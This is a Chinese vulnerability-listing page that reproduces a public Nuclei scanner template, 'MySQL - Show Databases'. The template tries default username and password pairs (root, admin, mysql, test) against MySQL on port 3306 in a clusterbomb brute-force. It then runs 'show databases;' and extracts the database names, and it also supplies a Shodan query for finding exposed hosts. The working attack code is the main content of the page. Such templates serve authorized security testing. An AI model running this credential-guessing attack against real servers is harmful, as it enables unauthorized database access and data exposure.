mysql-show-databases: MySQL - Show Databases

日期: 2025-08-01 | 影响软件: mysql | POC: 已公开

漏洞描述

PoC代码[已公开]

id: mysql-show-databases

info:
  name: MySQL - Show Databases
  author: DhiyaneshDk
  severity: high
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    verified: true
    max-request: 16
    shodan-query: "port:3306"
  tags: js,mysql,network,enum,discovery
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: "show databases;"
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - root
        - admin
        - mysql
        - test
      passwords:
        - root
        - admin
        - mysql
        - test
    attack: clusterbomb

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 490a0046304402200fe5194427a8c1723c44696c2059ce20b309b969d2cf4bd0931d538244188298022014e36110a0a463055152178845695186774e4c2234b15506693571d299a94621:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/enumeration/mysql/mysql-show-databases.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐